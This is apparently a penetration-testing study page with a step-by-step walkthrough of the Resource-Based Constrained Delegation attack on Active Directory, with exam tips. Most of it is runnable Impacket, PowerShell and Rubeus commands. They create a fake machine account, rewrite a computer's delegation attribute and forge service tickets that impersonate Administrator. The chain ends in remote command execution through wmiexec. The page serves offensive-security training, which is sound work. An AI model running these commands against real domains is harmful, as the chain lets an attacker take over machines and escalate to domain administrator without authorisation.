← Research Hub
Active Directory

RBCD Full Walkthrough

Resource-Based Constrained Delegation from WriteProperty to S4U2Self/S4U2Proxy β€” impersonating any user to a target service including Domain Admin.

RBCD Concept

Resource-Based Constrained Delegation (RBCD) allows a service account to impersonate any user to a target computer, controlled by the target computer's msDS-AllowedToActOnBehalfOfOtherIdentity attribute. If you can write this attribute on a computer object, you can make any machine account impersonate any user to that computer.

Requirements

  • WriteProperty/GenericWrite on a Computer object β€” e.g., via BloodHound edge on the target machine
  • A machine account you control β€” any computer account in the domain (or create one via MachineAccountQuota if MAQ > 0)
  • Impacket or Rubeus for the S4U2Self/S4U2Proxy ticket request

Attack Chain

# Step 1: Check MachineAccountQuota (default is 10 β€” domain users can add machines)
Get-ADDefaultDomainPasswordPolicy | Select MachineAccountQuota
# Or with CME:
nxc ldap DC_IP -u user -p pass -M maq

# Step 2: Create a fake machine account
impacket-addcomputer corp.local/jdoe:'Password1!' \
  -computer-name 'FAKEMACHINE$' -computer-pass 'FakePass123!' -dc-ip 10.10.10.5

# Step 3: Configure RBCD β€” set FAKEMACHINE$ as trusted to act on behalf on TARGET$
impacket-rbcd corp.local/jdoe:'Password1!' \
  -delegate-from 'FAKEMACHINE$' -delegate-to 'TARGET$' \
  -action write -dc-ip 10.10.10.5

# Step 4: Get TGT for FAKEMACHINE$
impacket-getTGT corp.local/'FAKEMACHINE$':'FakePass123!' -dc-ip 10.10.10.5
export KRB5CCNAME='FAKEMACHINE$.ccache'

# Step 5: S4U2Self + S4U2Proxy β€” get service ticket as Administrator
impacket-getST corp.local/'FAKEMACHINE$':'FakePass123!'   -spn cifs/TARGET.corp.local -impersonate Administrator -dc-ip 10.10.10.5
export KRB5CCNAME='Administrator@cifs_TARGET.corp.local@CORP.LOCAL.ccache'

# Step 6: Use the ticket
impacket-smbclient -k -no-pass corp.local/Administrator@TARGET.corp.local
impacket-wmiexec -k -no-pass corp.local/Administrator@TARGET.corp.local

With Rubeus (Windows)

# Step 1: Add fake machine (PowerMad)
New-MachineAccount -MachineAccount FAKEMACHINE -Password (ConvertTo-SecureString 'FakePass123!' -AsPlainText -Force)

# Step 2: Get SID of FAKEMACHINE$
Get-ADComputer FAKEMACHINE

# Step 3: Set msDS-AllowedToActOnBehalfOfOtherIdentity on TARGET$
$sd = New-Object Security.AccessControl.RawSecurityDescriptor "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-xxx-yyy-zzz-1234)"
$sdBytes = New-Object byte[] ($sd.BinaryLength)
$sd.GetBinaryForm($sdBytes, 0)
Get-ADComputer TARGET | Set-ADComputer -Replace @{'msds-allowedtoactonbehalfofotheridentity'=$sdBytes}

# Step 4: S4U chain via Rubeus
.Rubeus.exe s4u /user:FAKEMACHINE$ /rc4:<NTLM of FakePass123!> \
  /impersonateuser:Administrator /msdsspn:cifs/TARGET.corp.local /ptt

# Step 5: Access target
dir \TARGET.corp.localC$
Quick Win: BloodHound will show GenericWrite edges to computer objects. Any such edge = potential RBCD attack. The most common scenario: helpdesk users with GenericWrite on workstations.

Exam Tips

  • If MAQ=0, look for an existing machine account password you cracked β€” use that instead of creating a new one
  • Verify RBCD was set: Get-ADComputer TARGET -Properties msDS-AllowedToActOnBehalfOfOtherIdentity
  • The -impersonate user must be a domain user β€” impersonating krbtgt won't work
  • RBCD with Impacket requires matching DNS β€” ensure /etc/hosts has DC and target entries
  • Clean up: remove RBCD attribute and delete fake machine after exam to avoid leaving artifacts
// CONTENTS
RBCD Concept Requirements Attack Chain With Impacket Exam Tips
← AD CS ESC1–ESC8 Attack Chains Potato Attacks Comparison β†’ ↩ Back to Hub